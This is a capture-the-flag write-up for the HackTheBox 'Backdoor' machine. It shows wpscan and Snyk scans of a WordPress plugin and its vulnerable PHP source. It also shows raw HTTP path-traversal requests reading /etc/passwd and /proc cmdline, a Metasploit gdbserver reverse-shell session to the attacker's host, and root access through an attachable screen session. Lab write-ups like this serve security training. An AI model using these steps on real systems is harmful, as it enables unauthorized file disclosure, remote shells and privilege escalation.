User Flag

First, I used wpscan (you can get a free API token at https://wpscan.com/register).

I had to scan more aggressively or wpscan would find anything.

┌─[h3dg3h0g@vmware-ParrotOS]─[~/Desktop/HackTheBox/Machines/EASY/Backdoor]
└──╼ $wpscan --url http://backdoor.htb --detection-mode aggressive --api-token *********************************** --enumerate ap,at --plugins-detection aggressive                    
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.17
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://backdoor.htb/ [10.129.171.12]
[+] Started: Wed Jan  5 10:28:08 2022

Interesting Finding(s):

[+] XML-RPC seems to be enabled: http://backdoor.htb/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://backdoor.htb/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://backdoor.htb/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://backdoor.htb/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09).
 | Found By: Atom Generator (Aggressive Detection)
 |  - http://backdoor.htb/index.php/feed/atom/, <generator uri="https://wordpress.org/" version="5.8.1">WordPress</generator>
 | Confirmed By: Style Etag (Aggressive Detection)
 |  - http://backdoor.htb/wp-admin/load-styles.php, Match: '5.8.1'
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: WordPress < 5.8.2 - Expired DST Root CA X3 Certificate
 |     Fixed in: 5.8.2
 |     References:
 |      - https://wpscan.com/vulnerability/cc23344a-5c91-414a-91e3-c46db614da8d
 |      - https://wordpress.org/news/2021/11/wordpress-5-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/ticket/54207

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:09:58 <=============================================================================================> (96399 / 96399) 100.00% Time: 00:09:58
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://backdoor.htb/wp-content/plugins/akismet/
 | Latest Version: 4.2.1
 | Last Updated: 2021-10-01T18:28:00.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://backdoor.htb/wp-content/plugins/akismet/, status: 403
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
 |     Fixed in: 3.1.5
 |     References:
 |      - https://wpscan.com/vulnerability/1a2f3094-5970-4251-9ed0-ec595a0cd26c
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9357
 |      - http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
 |      - https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
 |
 | The version could not be determined.

[+] ebook-download
 | Location: http://backdoor.htb/wp-content/plugins/ebook-download/
 | Last Updated: 2020-03-12T12:52:00.000Z
 | Readme: http://backdoor.htb/wp-content/plugins/ebook-download/readme.txt
 | [!] The version is out of date, the latest version is 1.5
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://backdoor.htb/wp-content/plugins/ebook-download/, status: 200
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: Ebook Download < 1.2 - Directory Traversal
 |     Fixed in: 1.2
 |     References:
 |      - https://wpscan.com/vulnerability/13d5d17a-00a8-441e-bda1-2fd2b4158a6c
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10924
 |
 | Version: 1.1 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://backdoor.htb/wp-content/plugins/ebook-download/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://backdoor.htb/wp-content/plugins/ebook-download/readme.txt

[+] Enumerating All Themes (via Aggressive Methods)
 Checking Known Locations - Time: 00:02:28 <=============================================================================================> (23467 / 23467) 100.00% Time: 00:02:28
[+] Checking Theme Versions (via Aggressive Methods)

[i] Theme(s) Identified:

[+] twentynineteen
 | Location: http://backdoor.htb/wp-content/themes/twentynineteen/
 | Latest Version: 2.1
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://backdoor.htb/wp-content/themes/twentynineteen/readme.txt
 | Style URL: http://backdoor.htb/wp-content/themes/twentynineteen/style.css
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://backdoor.htb/wp-content/themes/twentynineteen/, status: 500
 |
 | The version could not be determined.

[+] twentyseventeen
 | Location: http://backdoor.htb/wp-content/themes/twentyseventeen/
 | Latest Version: 2.8
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://backdoor.htb/wp-content/themes/twentyseventeen/readme.txt
 | Style URL: http://backdoor.htb/wp-content/themes/twentyseventeen/style.css
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://backdoor.htb/wp-content/themes/twentyseventeen/, status: 500
 |
 | The version could not be determined.

[+] twentytwenty
 | Location: http://backdoor.htb/wp-content/themes/twentytwenty/
 | Latest Version: 1.8
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://backdoor.htb/wp-content/themes/twentytwenty/readme.txt
 | Style URL: http://backdoor.htb/wp-content/themes/twentytwenty/style.css
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://backdoor.htb/wp-content/themes/twentytwenty/, status: 500
 |
 | The version could not be determined.

[+] twentytwentyone
 | Location: http://backdoor.htb/wp-content/themes/twentytwentyone/
 | Latest Version: 1.4
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://backdoor.htb/wp-content/themes/twentytwentyone/readme.txt
 | Style URL: http://backdoor.htb/wp-content/themes/twentytwentyone/style.css
 | Style Name: Twenty Twenty-One
 | Style URI: https://wordpress.org/themes/twentytwentyone/
 | Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://backdoor.htb/wp-content/themes/twentytwentyone/, status: 500
 |
 | The version could not be determined.

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 6
 | Requests Remaining: 18

[+] Finished: Wed Jan  5 10:40:59 2022
[+] Requests Done: 119908
[+] Cached Requests: 42
[+] Data Sent: 31.843 MB
[+] Data Received: 28.026 MB
[+] Memory used: 455.082 MB
[+] Elapsed time: 00:12:50

It looks like the ebook-download plugin is vulnerable to path transversal, as described in CVE-2016-10924.

Since I couldn’t find any proof of concept, I instead searched for the source code of the vulnerable plugin which I found here https://wordpress.org/plugins/ebook-download/#developers.

Looking through the revisions, I found the same version that is installed on the server (v1.1) : https://plugins.trac.wordpress.org/browser/ebook-download/trunk?rev=1379105&order=name.

I then downloaded it and decided to inspect the source code using Snyk Code.

┌─[h3dg3h0g@vmware-ParrotOS]─[~/Desktop/HackTheBox/Machines/EASY/Backdoor/ebook-download/trunk]
└──╼ $snyk code test

Testing /home/h3dg3h0g/Desktop/HackTheBox/Machines/EASY/Backdoor/ebook-download/trunk ...

 ✗ [High] Server-Side Request Forgery (SSRF) 
     Path: filedownload.php, line 13 
     Info: Unsanitized input from an HTTP parameter flows into readfile, where it is used as an URL to perform a request. This may result in a Server-Side Request Forgery vulnerability.

 ✗ [High] SQL Injection 
     Path: ebookdownload.php, line 318 
     Info: Unsanitized input from an HTTP parameter flows into query, where it is used in an SQL query. This may result in an SQL Injection vulnerability.

 ✗ [High] SQL Injection 
     Path: ebookdownload.php, line 355 
     Info: Unsanitized input from an HTTP parameter flows into prepare, where it is used in an SQL query. This may result in an SQL Injection vulnerability.

 ✗ [High] Path Traversal 
     Path: filedownload.php, line 13 
     Info: Unsanitized input from an HTTP parameter flows into readfile, where it is used as a path. This may result in a Path Traversal vulnerability and allow an attacker to read arbitrary files.

 ✗ [High] Cross-site Scripting (XSS) 
     Path: filedownload.php, line 3 
     Info: Unsanitized input from an HTTP parameter flows into the echo statement, where it is used to render an HTML page returned to the user. This may result in a Cross-Site Scripting attack (XSS).

 ✗ [High] Cross-site Scripting (XSS) 
     Path: ebookdownload.php, line 428 
     Info: Unsanitized input from an HTTP parameter flows into the echo statement, where it is used to render an HTML page returned to the user. This may result in a Cross-Site Scripting attack (XSS).

 ✗ [High] Cross-site Scripting (XSS) 
     Path: widget-ebookdownload.php, line 77 
     Info: Unsanitized input from an HTTP header flows into the echo statement, where it is used to render an HTML page returned to the user. This may result in a Cross-Site Scripting attack (XSS).

 ✗ [High] Cross-site Scripting (XSS) 
     Path: widget-ebookdownload.php, line 113 
     Info: Unsanitized input from an HTTP header flows into the echo statement, where it is used to render an HTML page returned to the user. This may result in a Cross-Site Scripting attack (XSS).

 ✗ [High] Cross-site Scripting (XSS) 
     Path: widget-ebookdownload.php, line 133 
     Info: Unsanitized input from an HTTP header flows into the echo statement, where it is used to render an HTML page returned to the user. This may result in a Cross-Site Scripting attack (XSS).


✔ Test completed

Organization:      undefined
Test type:         Static code analysis
Project path:      /home/h3dg3h0g/Desktop/HackTheBox/Machines/EASY/Backdoor/ebook-download/trunk

9 Code issues found
9 [High]

Snyk found the path traversal vulnerability that we were looking for. While you should be able to find vulnerabilities in source code without the help of an automated tool (because it might miss things), I like to review code myself, and then run Snyk to see if we both find the same things.

So, in filedownload.php, it looks like the script just takes any file specified by the ebookdownloadurl argument and sends it back without any verification.

<?php
   
echo $ebookdownloadurl = ( isset( $_GET['ebookdownloadurl'] ) ) ? $_GET['ebookdownloadurl']: '';
echo $ebookdownloadurl = htmlspecialchars($ebookdownloadurl);
echo $ebookdownloadurl = strip_tags($ebookdownloadurl);
if($ebookdownloadurl){   
$path = parse_url($ebookdownloadurl, PHP_URL_PATH);  
$file_name = basename($path); 

header('Content-Type: application/octet-stream');
header("Content-Transfer-Encoding: Binary"); 
header("Content-disposition: attachment; filename=\"".$file_name."\""); 
readfile($ebookdownloadurl);
}
echo '<script>window.close()</script>';
exit;

?>

filedownload.php

Let’s try to download /etc/passwd.

GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/etc/passwd HTTP/1.1
Host: backdoor.htb
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://backdoor.htb/wp-content/plugins/ebook-download/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_test_cookie=WP%20Cookie%20check
Connection: close

Request to get /etc/passwd

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2022 17:47:01 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Transfer-Encoding: Binary
Content-disposition: attachment; filename="passwd"
Content-Length: 1941
Connection: close
Content-Type: application/octet-stream

/etc/passwd/etc/passwd/etc/passwdroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
user:x:1000:1000:user:/home/user:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false
<script>window.close()</script>

Answer with the content of /etc/passwd

I then tried to get the content of /home/user/.ssh/id_rsa but I didn’t get any result back.

I don’t get any result either when I try to get the content of /home/user/user.txt, which indicates me that we are probably reading files as www-data which is why we don’t have reading permissions in the /home/user directory.

After looking up on google on how to get a RCE from a LFI, I found multiple blogs that wrote about enumerating the /proc directory. From what I understand, the /proc directory is a pseudo filesystem that stores information about the running processes, but in a file format readable by cat for example.

In my enumeration, I stumbled upon /proc/959/cmdline.

Enumerating the running PIDs using BurpSuite Turbo Intruder

GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/959/cmdline HTTP/1.1
Host: backdoor.htb
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://backdoor.htb/wp-content/plugins/ebook-download/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_test_cookie=WP%20Cookie%20check
Connection: keep-alive

Request for /proc/959/cmdline

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2022 19:29:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Transfer-Encoding: Binary
Content-disposition: attachment; filename="cmdline"
Content-Length: 181
Keep-Alive: timeout=5, max=7
Connection: Keep-Alive
Content-Type: application/octet-stream

/proc/959/cmdline/proc/959/cmdline/proc/959/cmdline/bin/sh-cwhile true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; done<script>window.close()</script>

Answer with the content of /proc/959/cmdline

Which means this command runs on the server :

/bin/sh -c 
	while true;
		do su user -c "
			cd /home/user;
			gdbserver --once 0.0.0.0:1337 /bin/true;
			";
	done

A gdbserver is running on port 1337

Now that gives us a bit more information on that weird thing running on port 1337 that nmap couldn’t recognize.

According to the gdbserver documentation, gdbserver is a remote debugging server to which we can simply connect to and execute things.

Fortunately for us, there is already a metasploit module that allows us to easily upgrade a gdbserver connection to a more convenient shell. Note that the PAYLOAD and TARGET options in metasploit need to be fine tuned for the “exploit” to work.

msf6 exploit(multi/gdb/gdb_server_exec) > options

Module options (exploit/multi/gdb/gdb_server_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXE_FILE  /bin/true        no        The exe to spawn when gdbserver is not attached to a process.
   RHOSTS    backdoor.htb     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasp
                                        loit
   RPORT     1337             yes       The target port (TCP)


Payload options (linux/x64/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tun0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   x86_64 (64-bit)


msf6 exploit(multi/gdb/gdb_server_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.161:4444 
[*] 10.129.171.12:1337 - Performing handshake with gdbserver...
[*] 10.129.171.12:1337 - Stepping program to find PC...
[*] 10.129.171.12:1337 - Writing payload at 00007ffff7fd0103...
[*] 10.129.171.12:1337 - Executing the payload...
[*] Sending stage (38 bytes) to 10.129.171.12
[*] Command shell session 1 opened (10.10.14.161:4444 -> 10.129.171.12:37598) at 2022-01-05 16:01:37 -0500

id
uid=1000(user) gid=1000(user) groups=1000(user)

Root Flag

First, I stabilized the shell because the shell I had made me scream internally.

python3 -c 'import pty; pty.spawn("/bin/bash")'

Then I ran linpeas and this came out in the running processes :

root         952  0.0  0.1   8352  3412 ?        S    15:06   0:00  _ /usr/sbin/CRON -f
root         960  0.0  0.0   2608  1740 ?        Ss   15:06   0:10      _ /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root ;; done

After some googling, I found that screen is some sort of session manager :

When screen is called, it creates a single window with a shell in it (or the specified command) and then gets out of your way so that you can use the program as you normally would. Then, at any time, you can create new (full-screen) windows with other programs in them (including more shells), kill existing windows, view a list of windows, turn output logging on and off, copy-and-paste text between windows, view the scrollback history, switch between windows in whatever manner you wish, etc.

Also, it looks like anyone can attach to any running session that isn’t already in use. The -x option allows us to attach to a running session

-x Attach to a not detached screen session. (Multi display mode).

Listing the currently running sessions owned by root :

user@Backdoor:~$ screen -ls root/root
There is a suitable screen on:
        1008.root       (01/05/22 15:06:34)     (Multi, detached)
1 Socket in /run/screen/S-root.

We can then attach to it.

user@Backdoor:~$ screen -x root/1008.root

root@Backdoor:~# id
uid=0(root) gid=0(root) groups=0(root)

Backdoor Writeup (Using Snyk !)

User Flag

Root Flag